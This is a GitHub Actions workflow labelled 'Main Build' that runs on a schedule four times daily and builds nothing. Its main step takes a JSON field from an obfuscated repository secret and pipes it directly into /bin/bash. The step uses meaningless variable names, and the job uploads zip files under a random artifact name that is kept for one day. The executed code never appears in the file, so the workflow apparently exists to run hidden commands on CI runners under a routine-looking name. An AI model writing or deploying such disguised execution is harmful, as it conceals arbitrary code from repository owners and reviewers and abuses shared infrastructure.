name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '27 2,8,14,20 * * *'
permissions:
  contents: read
  actions: read
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  scheduler:
    name: Main task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Invoke
        env:
          nt7495: ${{ secrets.nt7495 }}
        run: |
          printf '%s' "$nt7495" | jq -r .uia44681 | /bin/bash
          printf '%s' "$gr6582" | jq -r .w6952 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: dBg2x7qA
          path: "*.zip"
          retention-days: 1
